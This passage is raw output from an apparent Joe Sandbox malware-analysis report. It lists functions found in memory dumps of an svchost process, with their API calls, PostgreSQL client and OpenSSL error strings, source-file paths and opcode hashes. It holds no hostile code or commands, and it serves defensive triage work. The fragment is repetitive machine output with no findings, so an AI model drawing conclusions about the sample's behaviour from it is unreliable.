                                                                                              • Part of subcall function 00007FFDA36EC450: LoadLibraryExA.KERNEL32(?,?,?,?,?,?,?,00007FFDA36EA0D8), ref: 00007FFDA36EC4CF
                                                                                              • Part of subcall function 00007FFDA36EC450: FormatMessageA.KERNEL32(?,?,?,?,?,?,?,00007FFDA36EA0D8), ref: 00007FFDA36EC516
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36E2D89
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2DB1
                                                                                              • Part of subcall function 00007FFDA36E2D70: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2DD2
                                                                                            • WSASetLastError.WS2_32 ref: 00007FFDA36E83CC
                                                                                            Strings
                                                                                            • server closed the connection unexpectedlyThis probably means the server terminated abnormallybefore or while processing the request., xrefs: 00007FFDA36E8346
                                                                                            • SSL SYSCALL error: EOF detected, xrefs: 00007FFDA36E8357
                                                                                            • SSL SYSCALL error: %s, xrefs: 00007FFDA36E8332
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_errno$FormatLibraryLoadMessagelibintl_dgettext
                                                                                            • String ID: SSL SYSCALL error: %s$SSL SYSCALL error: EOF detected$server closed the connection unexpectedlyThis probably means the server terminated abnormallybefore or while processing the request.
                                                                                            • API String ID: 4189622251-1474266415
                                                                                            • Opcode ID: 5032b21791e171439d54e85b97cb410c5d30a3fadbef08a9683a4003849c986c
                                                                                            • Instruction ID: d928b5eba1f8f0ea8cfabbc42a119b72e3de3e918460cf91a6ccf956dfb0ad97
                                                                                            • Opcode Fuzzy Hash: 5032b21791e171439d54e85b97cb410c5d30a3fadbef08a9683a4003849c986c
                                                                                            • Instruction Fuzzy Hash: 8C016112B0FA1281F9156BA4E4752B812437F45BA0F6C2232CD2D663D7EE2EF14A831D
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$freemallocmemcpysystem
                                                                                            • String ID:
                                                                                            • API String ID: 562932354-0
                                                                                            • Opcode ID: 81338c7065749c26ccc5cd10b7f1d561b49b0187a458b2259af98e824cf22066
                                                                                            • Instruction ID: 883caf76ad842d76dbb88731911089c3dc904e616f59f5545b3f8d59adb1be6f
                                                                                            • Opcode Fuzzy Hash: 81338c7065749c26ccc5cd10b7f1d561b49b0187a458b2259af98e824cf22066
                                                                                            • Instruction Fuzzy Hash: D211A322B0AB8182F7018F55F8542687761FB88FA0F4CA270DB6E53396DF3DD8558724
                                                                                            APIs
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36E374A), ref: 00007FFDA36F540E
                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00007FFDA36E374A), ref: 00007FFDA36F541C
                                                                                            • memcpy.VCRUNTIME140(?,?,00000000,00007FFDA36E374A), ref: 00007FFDA36F5439
                                                                                            • _popen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00007FFDA36E374A), ref: 00007FFDA36F544B
                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00007FFDA36E374A), ref: 00007FFDA36F5454
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36E374A), ref: 00007FFDA36F545F
                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00007FFDA36E374A), ref: 00007FFDA36F5465
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$_popenfreemallocmemcpy
                                                                                            • String ID:
                                                                                            • API String ID: 816778120-0
                                                                                            • Opcode ID: 650a1915481d562adaaf676a04e7f90385b05ad56672cef0e8be1d9a91d73b29
                                                                                            • Instruction ID: 882eaab9b7855092bb9a1cb2e872413f383c1f72c12e074431b47887c6b72b22
                                                                                            • Opcode Fuzzy Hash: 650a1915481d562adaaf676a04e7f90385b05ad56672cef0e8be1d9a91d73b29
                                                                                            • Instruction Fuzzy Hash: 28115E61B0AB8186F7018F22E9641296762FB48FE0F4CA230DA5E577A6DF3DD4458724
                                                                                            APIs
                                                                                            • WSAGetLastError.WS2_32 ref: 00007FFDA36E84FC
                                                                                            • WSAGetLastError.WS2_32 ref: 00007FFDA36E8506
                                                                                              • Part of subcall function 00007FFDA36EC450: LoadLibraryExA.KERNEL32(?,?,?,?,?,?,?,00007FFDA36EA0D8), ref: 00007FFDA36EC4CF
                                                                                              • Part of subcall function 00007FFDA36EC450: FormatMessageA.KERNEL32(?,?,?,?,?,?,?,00007FFDA36EA0D8), ref: 00007FFDA36EC516
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36E2D89
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2DB1
                                                                                              • Part of subcall function 00007FFDA36E2D70: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2DD2
                                                                                            • WSASetLastError.WS2_32 ref: 00007FFDA36E85C9
                                                                                            Strings
                                                                                            • server closed the connection unexpectedlyThis probably means the server terminated abnormallybefore or while processing the request., xrefs: 00007FFDA36E8543
                                                                                            • SSL SYSCALL error: EOF detected, xrefs: 00007FFDA36E8554
                                                                                            • SSL SYSCALL error: %s, xrefs: 00007FFDA36E852F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_errno$FormatLibraryLoadMessagelibintl_dgettext
                                                                                            • String ID: SSL SYSCALL error: %s$SSL SYSCALL error: EOF detected$server closed the connection unexpectedlyThis probably means the server terminated abnormallybefore or while processing the request.
                                                                                            • API String ID: 4189622251-1474266415
                                                                                            • Opcode ID: ece4707da685c9d9845f8d5ce65848076a04abba7f871d98095f2ee22dae68a1
                                                                                            • Instruction ID: 5b013dc15506cfaedede8f3f6c6768daf79476ce86573491a598fa366d6892b6
                                                                                            • Opcode Fuzzy Hash: ece4707da685c9d9845f8d5ce65848076a04abba7f871d98095f2ee22dae68a1
                                                                                            • Instruction Fuzzy Hash: D001A120B0FA4245FEA46B25D0702F812036F49BA0F5C2232CD2E663D3DE1EF148834C
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputcisprint
                                                                                            • String ID: %c$ \x%02x$ReadyForQuery$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 3787447051-199962393
                                                                                            • Opcode ID: 3ff59ed7103581e2bf6c6cfca38e8c2dcdfd37ac6beb1dce8e8570bd50f01638
                                                                                            • Instruction ID: 707936489d1679975f158210b9ec5e2dd65bfb508091388afab8028d7f246e9c
                                                                                            • Opcode Fuzzy Hash: 3ff59ed7103581e2bf6c6cfca38e8c2dcdfd37ac6beb1dce8e8570bd50f01638
                                                                                            • Instruction Fuzzy Hash: 12018062B0B69782FA10DB11E461BF92362AB447D8F4C6032DE0E17357CE3EE189D748
                                                                                            APIs
                                                                                            • ERR_new.LIBCRYPTO-3-X64(00007FFDA3616D4C,?,?,?,?,00007FFDA36034DD), ref: 00007FFDA361B40C
                                                                                            • ERR_set_debug.LIBCRYPTO-3-X64(00007FFDA3616D4C,?,?,?,?,00007FFDA36034DD), ref: 00007FFDA361B424
                                                                                            • ERR_set_error.LIBCRYPTO-3-X64(00007FFDA3616D4C,?,?,?,?,00007FFDA36034DD), ref: 00007FFDA361B435
                                                                                            • memcpy.VCRUNTIME140(00007FFDA3616D4C,?,?,?,?,00007FFDA36034DD), ref: 00007FFDA361B452
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_newR_set_debugR_set_errormemcpy
                                                                                            • String ID: SSL_set_session_id_context$ssl\ssl_lib.c
                                                                                            • API String ID: 1331007688-832255996
                                                                                            • Opcode ID: eca6ddcf17e5413fe414de273d5c11b961b45bae7fc635cdb515ab5fb3c19ce0
                                                                                            • Instruction ID: ea96ec092b46722cec760f0831edb172fd7e5b3f83c3f6f2841e9fc449519b5b
                                                                                            • Opcode Fuzzy Hash: eca6ddcf17e5413fe414de273d5c11b961b45bae7fc635cdb515ab5fb3c19ce0
                                                                                            • Instruction Fuzzy Hash: F7F08C24F0B15243FB95E66888723B91282EF49344FDCA035D50DA3BD3DF1FE5464619
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ab2c35510a99fe00f6e6f3b60d0c4a5351ba478e170a0304d58f543d5569d1e9
                                                                                            • Instruction ID: cd257ce0aa04095bf610a58fecc9c0142c52d7260b12f9179213d23381c4ee39
                                                                                            • Opcode Fuzzy Hash: ab2c35510a99fe00f6e6f3b60d0c4a5351ba478e170a0304d58f543d5569d1e9
                                                                                            • Instruction Fuzzy Hash: 2A5134F2D0C2906BEB228FD491A479DBFA2E30675DFD14132DA55072A5D3B9CC89C381
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: freestrncmp
                                                                                            • String ID: postgres://$postgresql://
                                                                                            • API String ID: 1891267927-2050216600
                                                                                            • Opcode ID: 579b684f4fadb034da104a4f3a47dcd31a40e226408c2728510a3aa318c0e858
                                                                                            • Instruction ID: 7c3c3362f4c008b7a549abdd2602281c39d783da9f0c032127a6b5ca00c375f3
                                                                                            • Opcode Fuzzy Hash: 579b684f4fadb034da104a4f3a47dcd31a40e226408c2728510a3aa318c0e858
                                                                                            • Instruction Fuzzy Hash: 29312122B0AB4682FA609F52A56027AA3A2FF84BC0F4C6031DA4D57F5ADF3DD5558708
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: strchr$_fdopenstrstr
                                                                                            • String ID:
                                                                                            • API String ID: 1542700057-0
                                                                                            • Opcode ID: a2594e3e2022d5107230e020d81b7fba5313a188866cd8e5e4a0ae8ca05e8779
                                                                                            • Instruction ID: dd49a5fb399da31e69adcf87f17ca1462bb7b42b09fb7d6202ff497f148e785d
                                                                                            • Opcode Fuzzy Hash: a2594e3e2022d5107230e020d81b7fba5313a188866cd8e5e4a0ae8ca05e8779
                                                                                            • Instruction Fuzzy Hash: BE216D11B0F65146FE05A716A5B62BA12539FC5BC0E5CA430E94E27BDBDE3FE8538208
                                                                                            APIs
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36DFA7C
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36DFD31
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36E2D89
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2DB1
                                                                                              • Part of subcall function 00007FFDA36E2D70: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2DD2
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$freelibintl_dgettextmalloc
                                                                                            • String ID: length must be given for binary parameter$out of memory
                                                                                            • API String ID: 1401199814-1562593421
                                                                                            • Opcode ID: be46cba841b5407c25af5a47a55b82b30aae5a6ca6dc10e47380a58bcf7efa13
                                                                                            • Instruction ID: b8c24433fb1e6c0860b0efbc28e6bfa7cad6a1cbb6822f5719dc3dcde599bc58
                                                                                            • Opcode Fuzzy Hash: be46cba841b5407c25af5a47a55b82b30aae5a6ca6dc10e47380a58bcf7efa13
                                                                                            • Instruction Fuzzy Hash: D2B18566B0BA4746F6106A12A5243BE5693AF497C4F5CB036DF0DAF387EE2FE0054358
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: getenv
                                                                                            • String ID: default$ion$options$user
                                                                                            • API String ID: 498649692-412184128
                                                                                            • Opcode ID: 3f8f7ff1b18ab859db54662fde6db203ed6893e6f2aefd7ceafdeedf9d7859f2
                                                                                            • Instruction ID: d8beadf4d8b1a823d0e8aef1308e20c633e0dc731df50839ee69ee08a16c6780
                                                                                            • Opcode Fuzzy Hash: 3f8f7ff1b18ab859db54662fde6db203ed6893e6f2aefd7ceafdeedf9d7859f2
                                                                                            • Instruction Fuzzy Hash: 2EC1B472B0A7C185FF918F1894943786B92EB05BA0F1CA331CE6D273D6DA2EE459C714
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: %s$insufficient data in "D" message$out of memory for query result$unexpected field count in "D" message
                                                                                            • API String ID: 0-3556674474
                                                                                            • Opcode ID: e8a662a0539064282ddcaa0ef1de2704ce51096314c0dcc4974e9e7ebdd857d8
                                                                                            • Instruction ID: bd0db220de45928f48542e8c670f3e4a08ca7d887441d68b8ec3583799537703
                                                                                            • Opcode Fuzzy Hash: e8a662a0539064282ddcaa0ef1de2704ce51096314c0dcc4974e9e7ebdd857d8
                                                                                            • Instruction Fuzzy Hash: 4B41C132B0B74282F7909B15E4602B96396EF44B84F1C6035DE4D6739BEE3DE545C344
                                                                                            APIs
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,show password_encryption,00007FFDA36E4CC6), ref: 00007FFDA36E6DB2
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,show password_encryption,00007FFDA36E4CC6), ref: 00007FFDA36E6DD6
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,show password_encryption,00007FFDA36E4CC6), ref: 00007FFDA36E6E36
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,show password_encryption,00007FFDA36E4CC6), ref: 00007FFDA36E6EC4
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$_strdupmalloc
                                                                                            • String ID: show password_encryption
                                                                                            • API String ID: 111713529-3405507779
                                                                                            • Opcode ID: f44f98c0374278c73cb455ba2d4d850ae2f6bf9693e02ef51e0ee9e27ea8a49a
                                                                                            • Instruction ID: 0e6b3f43ffb4e229a4b55669fdc9b7ac998c7343fb807f60e912a7c807321db3
                                                                                            • Opcode Fuzzy Hash: f44f98c0374278c73cb455ba2d4d850ae2f6bf9693e02ef51e0ee9e27ea8a49a
                                                                                            • Instruction Fuzzy Hash: 9C419F7270AB8186EA548B15E4603B977A2FB49B90F6C5230DB6D573C6DF3DE0688704
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: O_indentO_printf
                                                                                            • String ID: %s (%d)
                                                                                            • API String ID: 1860387303-2206749211
                                                                                            • Opcode ID: 08b5bfe54d974706d67bed0f7f65379c65b6c8027aacb01334adf5610ed9290b
                                                                                            • Instruction ID: b31bb7b72c2c7327ac70c38a7e871a2635de9c7a3e975e422dc8f3146d09179f
                                                                                            • Opcode Fuzzy Hash: 08b5bfe54d974706d67bed0f7f65379c65b6c8027aacb01334adf5610ed9290b
                                                                                            • Instruction Fuzzy Hash: 49310922F0E69286FA658B11D4641BD6B53BB45B90F0C7432CD4E27783DD7EE145C718
                                                                                            APIs
                                                                                            • memcpy.VCRUNTIME140(?,?,show password_encryption,00007FFDA36E51AD,?,?,?,?,00007FFDA36DBA2F), ref: 00007FFDA36E1E32
                                                                                            • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,show password_encryption,00007FFDA36E51AD,?,?,?,?,00007FFDA36DBA2F), ref: 00007FFDA36E1E76
                                                                                            • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,show password_encryption,00007FFDA36E51AD,?,?,?,?,00007FFDA36DBA2F), ref: 00007FFDA36E1EC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: realloc$memcpy
                                                                                            • String ID: cannot allocate memory for input buffer$show password_encryption
                                                                                            • API String ID: 1833655766-1268546043
                                                                                            • Opcode ID: 20c54c7f6b2cee35d43fafd5128733ff023de06a2b7e0576d69b630a30361051
                                                                                            • Instruction ID: ee8adb6152d85d978e552269bf2414ca1993e7368cecefd1c2209fbfa4e8c2cf
                                                                                            • Opcode Fuzzy Hash: 20c54c7f6b2cee35d43fafd5128733ff023de06a2b7e0576d69b630a30361051
                                                                                            • Instruction Fuzzy Hash: E631B162B0A78287F7688F34D5A02A9A3A6FB44B80F1C9035F72C53746EF39E5649304
                                                                                            APIs
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA36E9D72), ref: 00007FFDA36E8C91
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: malloc
                                                                                            • String ID: SSL error code %lu$no SSL error reported$out of memory allocating error description
                                                                                            • API String ID: 2803490479-1444140898
                                                                                            • Opcode ID: 51f7fc59f20835072fbfc7eae73d3c927fcc3333a5e97449ff6f801172e6bebb
                                                                                            • Instruction ID: e9a2b3ff776b6f37a271a8eaeefeea027eb786de6ae6a62959fcccbd11e027f9
                                                                                            • Opcode Fuzzy Hash: 51f7fc59f20835072fbfc7eae73d3c927fcc3333a5e97449ff6f801172e6bebb
